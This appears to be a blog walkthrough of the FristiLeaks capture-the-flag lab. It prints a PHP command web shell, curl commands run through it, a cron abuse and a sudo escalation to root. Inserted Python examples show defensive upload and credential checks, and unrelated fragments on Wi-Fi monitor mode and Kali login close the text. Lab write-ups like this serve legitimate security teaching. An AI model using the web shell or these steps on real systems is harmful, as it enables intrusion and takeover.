I have shifted here.
c0dehouse shall now be maintained at http://n0tty.github.io from now on.
Please continue visiting! :)
My (attacker) IP: 192.168.56.102
Vulnerable Image IP: 192.168.56.103
Software setup: Oracle VirtualBox on Kali 2.0
nmap -A -p- 192.168.56.103 -oA fristileaks
<meta name="description" content="super leet password login-test page. We use base64 encoding for images so they are inline in the HTML. I read somewhere on the web, that thats a good way to do it.">
<!--
TODO:
We need to clean this up for production. I left some junk in here to make testing easier.
- by eezeepz
-->
At the bottom of the page we found a small base64-encoded snippet in an HTML comment, which quite obviously decodes to an image:
<!--
iVBORw0KGgoAAAANSUhEUgAAAW0AAABLCAIAAAA04UHqAAAAAXNSR0IArs4c6QAAAARnQU1BAACx
jwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAARSSURBVHhe7dlRdtsgEIVhr8sL8nqymmwmi0kl
S0iAQGY0Nb01//dWSQyTgdxz2t5+AcCHHAHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixw
B4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzkCwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL5kc+f
m63yaP7/XP/5RUM2jx7iMz1ZdqpguZHPl+zJO53b9+1gd/0TL2Wull5+RMpJq5tMTkE1paHlVXJJ
Zv7/d5i6qse0t9rWa6UMsR1+WrORl72DbdWKqZS0tMPqGl8LRhzyWjWkTFDPXFmulC7e81bxnNOvb
DpYzOMN1WqplLS0w+oaXwomXXtfhL8e6W+lrNdDFujoQNJ9XbKtHMpSUmn9BSeGf51bUcr6W+VjNd
jJQjcelwepPCjlLNXFpi8gktXfnVtYSd6UpINdPFCDlyKB3dyPLpSTVzZYnJR7R0WHEiFGv5NrDU
12qmC/1/Zz2ZWXi1abli0aLqjZdq5sqSxUgtWY7syq+u6UpINdOFeI5ENygbTfj+qDbc+QpG9c5
uvFQzV5aM15LlyMrfnrPU12qmC+Ucqd+g6E1JNsX16/i/6BtvvEQzF5YM2JLhyMLz4sNNtp/pSkg1
04VajmwziEdZvmSz9E0YbzbI/FSycgVSzZiXDNmS4cjCni+kLRnqizXThUqOhEkso2k5pGy00aLq
i1n+skSqGfOSIVsKC5Zv4+XH36vQzbl0V0t9rWb6EMyRaLLp+Bbhy31k8SBbjqpUNSHVjHXJmC2Fg
tOH0drysrz404sdLPW1mulDLUdSpdEsk5vf5Gtqg1xnfX88tu/PZy7VjHXJmC21H9lWvBBfdZb6Ws
30oZ0jk3y+pQ9fnEG4lNOco9UnY5dqxrhk0JZKezwdNwqfnv6AOUN9sWb6UMyR5zT2B+lwDh++Fl
3K/U+z2uFJNWNcMmhLzUe2v6n/dAWG+mLN9KGWI9EcKsMJl6o6+ecH8dv0Uu4PnkqDl2rGuiS8HK
ul9iMrFG9gqa/VTB8qORLuSTqF7fYU7tgsn/4+zfhV6aiiIsczlGrGvGTIlsLLhiPbnh6KnLDU12q
mD+0cKQ8nunpVcZ21Rj7erEz0WqoZ+5IRW1oXNB3Z/vBMWulSfYlm+hDLkcIAtuHEUzu/l9l867X34
rPtA6lmLi0ZrqX6gu37aIukRkVaylRfqpk+9HNkH85hNocTKC4P31Vebhd8fy/VzOTCkqeBWlrrFhe
EPdMjO3SSys7XVF+qmT5UcmT9+Ss//fyyOLU3kWoGLd59ZKb6Us10IZMjAP5b5AgAL3IEgBc5AsCLH
AHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixwB4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzk
CwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL3IEgBc5AsCLHAHgRY4A8Pn9/QNa7zik1qtycQAAAABJR
U5ErkJggg==
-->
This leads us to
By now we can all guess who the user is and what his password would be.
After logging in, the harder portion of the 4 hours started: we now find a file upload page.
From the enumeration, we knew the server was Apache 2.2.15 running with PHP 5.3.3.
This pointed to the most common configuration mistake for that stack: a file uploaded as x.php.png is still executed as PHP.
I quickly wrote a 5 line script and uploaded it on the server.
<?php
// Minimal command shell: runs whatever is passed in the "cmd" parameter
// and echoes the command back between the closing/opening pre tags.
if (isset($_REQUEST['cmd'])) {
    $cmd = $_REQUEST['cmd'];
    system($cmd);
    echo "</pre>$cmd<pre>";
    die;
}
?>
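Added example in Python (my code, not from the original writeup): an upload check that shows why inspecting only the final extension accepts shell.php.png, next to a stricter check that validates every dot-separated segment and the file's magic bytes, then assigns a server-chosen name. Apache's mod_mime can map a handler from any extension segment of a filename, so with the usual AddHandler/AddType mapping for .php a .php.png upload is still run as PHP. The allowlist, the magic-byte table and the stored-name scheme are my assumptions.

```python
import os
import secrets
from typing import Optional

# Constructed allowlist: the only image types this upload endpoint accepts.
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif"}

# Constructed magic-byte table for those types (the first bytes of each format).
MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}


def _final_extension(filename: str) -> str:
    return os.path.basename(filename).rsplit(".", 1)[-1].lower()


def last_extension_only(filename: str) -> bool:
    """The weak check: only the final extension is inspected, so
    'shell.php.png' is accepted because it ends in .png."""
    return _final_extension(filename) in ALLOWED_EXTENSIONS


def all_extensions_allowed(filename: str) -> bool:
    """Stricter check: every dot-separated segment after the base name must be
    an allowed extension. mod_mime may map a handler from any segment, so a
    '.php' anywhere in the name is a reason to reject."""
    parts = os.path.basename(filename).split(".")
    if len(parts) < 2 or not parts[0]:  # no extension, or a dotfile such as .htaccess
        return False
    return all(p.lower() in ALLOWED_EXTENSIONS for p in parts[1:])


def content_matches_extension(filename: str, data: bytes) -> bool:
    """The bytes must start with the magic of the claimed type; a PHP payload
    renamed to .png fails here even when the name itself looks fine."""
    magic = MAGIC.get(_final_extension(filename))
    return magic is not None and data.startswith(magic)


def safe_stored_name(filename: str, data: bytes) -> Optional[str]:
    """Return a server-chosen filename with a single validated extension, or
    None to reject the upload. The client never controls the stored name."""
    if not (all_extensions_allowed(filename) and content_matches_extension(filename, data)):
        return None
    return "%s.%s" % (secrets.token_hex(16), _final_extension(filename))
```

The segment check is deliberately strict: a name such as my.photo.png is rejected too, because an unexpected inner segment is exactly what the weak check misses. Storing under a random name with one known extension also removes the attacker's control over the path the web server later maps to a handler.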
$ curl http://192.168.56.103/fristi/uploads/shell.php.png -d"cmd=ls"
$ curl http://192.168.56.103/fristi/uploads/shell.php.png -d"cmd=cat ../../../notes.txt"
hey eezeepz your homedir is a mess, go clean it up, just dont delete
the important stuff.
-jerry
</pre>cat ../../../notes.txt<pre>
$ curl http://192.168.56.103/fristi/uploads/shell.php.png -d"cmd=cat /home/eezeepz/notes.txt"
Yo EZ,
I made it possible for you to do some automated checks,
but I did only allow you access to /usr/bin/* system binaries. I did
however copy a few extra often needed commands to my
homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those
from /home/admin/
Don't forget to specify the full path for each binary!
Just put a file called "runthis" in /tmp/, each line one command. The
output goes to the file "cronresult" in /tmp/. It should
run every minute with my account privileges.
- Jerry
</pre>cat /home/eezeepz/notes.txt<pre>
$ curl http://192.168.56.103/fristi/uploads/shell.php.png -d"cmd=echo 'chmod 777 /home/admin'>/tmp/runthis"
$ curl http://192.168.56.103/fristi/uploads/shell.php.png -d"cmd=cat /tmp/cronresult"
command did not start with /home/admin or /usr/bincommand did not start with /home/admin or /usr/bincommand did not start with /home/admin or /usr/bin
$ curl http://192.168.56.103/fristi/uploads/shell.php.png -d"cmd=echo '/home/admin/chmod 777 /home/admin'>/tmp/runthis"
$ curl http://192.168.56.103/fristi/uploads/shell.php.png -d"cmd=cat /tmp/cronresult"
command did not start with /home/admin or /usr/bincommand did not start with /home/admin or /usr/bincommand did not start with /home/admin or /usr/bin
executing: /home/admin/chmod 777 /home/admin
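Added example in Python (mine, not the box's own cron script): the cronresult wording suggests a plain string-prefix test on each command line, and the job file is read from world-writable /tmp. The functions below contrast that prefix test with a check on the resolved executable's directory, and refuse a job file that is not a regular file owned by the expected user with no group or world write bit. ALLOWED_DIRS, the function names and the demo's temporary file are my constructions; nothing here executes a command.

```python
import os
import stat
import tempfile

# Constructed allowlist mirroring the note: /usr/bin plus the copies in /home/admin.
ALLOWED_DIRS = ("/usr/bin", "/home/admin")


def prefix_check(command):
    """The weak test the cronresult wording suggests: a plain string-prefix
    match on the command line. '/usr/binx' or '/home/adminx' pass it."""
    return command.startswith(ALLOWED_DIRS)


def binary_is_allowed(command):
    """Stronger test: take the executable, resolve symlinks, and require that
    its directory (not merely its string prefix) is an allowed directory."""
    words = command.split()
    if not words or not words[0].startswith("/"):
        return False
    return os.path.dirname(os.path.realpath(words[0])) in ALLOWED_DIRS


def job_file_is_trusted(path, expected_uid):
    """Refuse a job file that someone other than its intended owner could have
    written: a symlink or other non-regular file, the wrong owner, or any
    group/world write permission. A world-writable /tmp/runthis fails here."""
    st = os.lstat(path)
    if not stat.S_ISREG(st.st_mode):
        return False
    if st.st_uid != expected_uid:
        return False
    return not (st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def plan_job(path, expected_uid):
    """Decide, without executing anything, which lines of the job file would be
    run. Returns [] when the file itself is not trustworthy."""
    if not job_file_is_trusted(path, expected_uid):
        return []
    with open(path) as fh:
        lines = [line.strip() for line in fh if line.strip()]
    return [(line, binary_is_allowed(line)) for line in lines]


def demo_job_file_checks():
    """Self-contained demonstration on a constructed temp file: owned by us and
    mode 0600 it is trusted; after chmod 666 the whole job is refused."""
    fd, path = tempfile.mkstemp()
    try:
        with os.fdopen(fd, "w") as fh:
            fh.write("/home/admin/chmod 777 /home/admin\n/tmp/evil\n")
        results = {
            "trusted_0600": job_file_is_trusted(path, os.getuid()),
            "plan_0600": plan_job(path, os.getuid()),
        }
        os.chmod(path, 0o666)
        results["trusted_0666"] = job_file_is_trusted(path, os.getuid())
        results["plan_0666"] = plan_job(path, os.getuid())
        return results
    finally:
        os.remove(path)
```

Note that the line from the writeup, /home/admin/chmod 777 /home/admin, passes the directory check just as it passed the box's own test; the allowlist was not the real weakness. What would have stopped the attack is refusing a job file that the web server's user could write, which is what job_file_is_trusted enforces.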
$ curl http://192.168.56.103/fristi/uploads/shell.php.png -d"cmd=cat /home/admin/cryptedpass.txt"
mVGZ3O3omkJLmy2pcuTq
</pre>cat /home/admin/cryptedpass.txt<pre>
$ curl http://192.168.56.103/fristi/uploads/shell.php.png -d"cmd=cat /home/admin/cryptpass.py"
#Enhanced with thanks to Dinesh Singh Sikawar @LinkedIn
import base64,codecs,sys
def encodeString(str):
    base64string= base64.b64encode(str)
    return codecs.encode(base64string[::-1], 'rot13')
cryptoResult=encodeString(sys.argv[1])
print cryptoResult
</pre>cat /home/admin/cryptpass.py<pre>
$ curl http://192.168.56.103/fristi/uploads/shell.php.png -d"cmd=cat /home/admin/whoisyourgodnow.txt"
=RFn0AKnlMHMPIzpyuTI0ITG
</pre>cat /home/admin/whoisyourgodnow.txt<pre>
$ cat decryptpass.py
#!/usr/bin/python
import base64, codecs, sys

def decodeString(token):
    # rot13 is its own inverse (26 letters, shift of 13), so applying it again
    # after undoing the reversal gives back the original base64 string
    base64string = codecs.encode(token[::-1], 'rot13')
    return base64.b64decode(base64string).decode('ascii')  # base64 decoding

cryptoResult = decodeString(sys.argv[1])
print(cryptoResult)
$ python decryptpass.py mVGZ3O3omkJLmy2pcuTq
thisisalsopw123
$ python decryptpass.py =RFn0AKnlMHMPIzpyuTI0ITG
LetThereBeFristi!
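The encode/decode pair as an added example (my code, not the box's files): the scheme is base64, string reversal and rot13 with no key at all, so anyone who can read cryptpass.py can undo it, and the two tokens from the box round-trip exactly. Alongside it, a salted PBKDF2 store/verify pair (my choice, standard library only) shows what a stored credential that cannot be reversed looks like.

```python
import base64
import codecs
import hashlib
import hmac
import os


def encode_password(plaintext):
    """Same transform as cryptpass.py: base64, reverse, rot13. No key is involved."""
    b64 = base64.b64encode(plaintext.encode()).decode()
    return codecs.encode(b64[::-1], "rot13")


def decode_password(token):
    """Inverse: rot13 undoes itself, reversing undoes the reversal, then base64-decode."""
    b64 = codecs.encode(token[::-1], "rot13")
    return base64.b64decode(b64).decode()


def store_password(plaintext, iterations=600000):
    """What 'cryptedpass' should have been: a salted, deliberately slow one-way
    hash (PBKDF2-HMAC-SHA256). The stored string cannot be turned back into
    the password; it can only be checked against a candidate."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", plaintext.encode(), salt, iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (iterations, salt.hex(), dk.hex())


def verify_password(plaintext, stored):
    """Recompute with the stored salt and iteration count; compare in constant time."""
    alg, iters, salt_hex, dk_hex = stored.split("$")
    if alg != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", plaintext.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    # The two tokens recovered on the box, decoded with the constructed inverse.
    for token in ("mVGZ3O3omkJLmy2pcuTq", "=RFn0AKnlMHMPIzpyuTI0ITG"):
        print(token, "->", decode_password(token))
    record = store_password("LetThereBeFristi!")
    print(record, verify_password("LetThereBeFristi!", record))
```

One visible tell of the scheme: base64 padding ends up at the front of the token after reversal, which is why the second token begins with "=".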
$ python -c 'import pty; pty.spawn("/bin/sh")'
/var/fristigod/.secret_admin_stuff/doCom
bash-4.1$ ./var/fristigod/.secret_admin_stuff/doCom
./var/fristigod/.secret_admin_stuff/doCom
Nice try, but wrong user ;)
bash-4.1$ sudo ./doCom
sudo ./doCom
Sorry, user fristigod is not allowed to execute './doCom' as root on localhost.localdomain.
bash-4.1$ sudo -l
sudo -l
Matching Defaults entries for fristigod on this host:
requiretty, !visiblepw, always_set_home, env_reset, env_keep="COLORS
DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1
PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE
LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL
LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User fristigod may run the following commands on this host:
(fristi : ALL) /var/fristigod/.secret_admin_stuff/doCom
bash-4.1$ sudo -u fristi ./doCom
sudo -u fristi ./doCom
Usage: ./program_name terminal_command ...
bash-4.1$ sudo -u fristi ./doCom /bin/bash
sudo -u fristi ./doCom /bin/bash
bash-4.1# id
id
uid=0(root) gid=100(users) groups=100(users),502(fristigod)
bash-4.1# cd /root
cd /root
bash-4.1# ls
ls
fristileaks_secrets.txt
bash-4.1# cat fristileaks_secrets.txt
cat fristileaks_secrets.txt
Congratulations on beating FristiLeaks 1.0 by Ar0xA [https://tldr.nu]
I wonder if you beat it in the maximum 4 hours it's supposed to take!
Shoutout to people of #fristileaks (twitter) and #vulnhub (FreeNode)
Flag: Y0u_kn0w_y0u_l0ve_fr1st1
Information Gathering - Service Enumeration - Penetration - Maintaining Access - Housekeeping
Intelligence Gathering - Information Gathering + Service Enumeration = 80% of our work (40% for entry point)
Penetration = 5% of our work
Lateral Movement = 55% of our work (40% intelligence gathering post exploitation + 15% penetration into the crown of the network)
~# airmon-ng start wlan0
...
~# airodump-ng wlan0mon
ioctl(SIOCSIWMODE) failed: Device or resource busy
~# ifconfig wlan0mon down
~# iwconfig wlan0mon mode monitor
~# ifconfig wlan0mon up
~# airodump-ng wlan0mon
~# airmon-ng check kill
A terrible feeling when the grey page stares back at you and your head says: "Oh no! Something has gone wrong. A problem has occurred and the system can't recover. Please log out and try again."
"hah you should have rather done a fresh install and wasted 10 hours from your life taking a backup and reformatting your LVM encrypted system."
root@kali:~# nano /etc/gdm3/daemon.conf
Now add the following two lines. They make the system log the non-root user in automatically after booting. I still haven't finished debugging this, so I cannot give the exact reason for the error.
AutomaticLoginEnable = true
AutomaticLogin = <Non-root Username>
If you can't sell it, don't bother making it.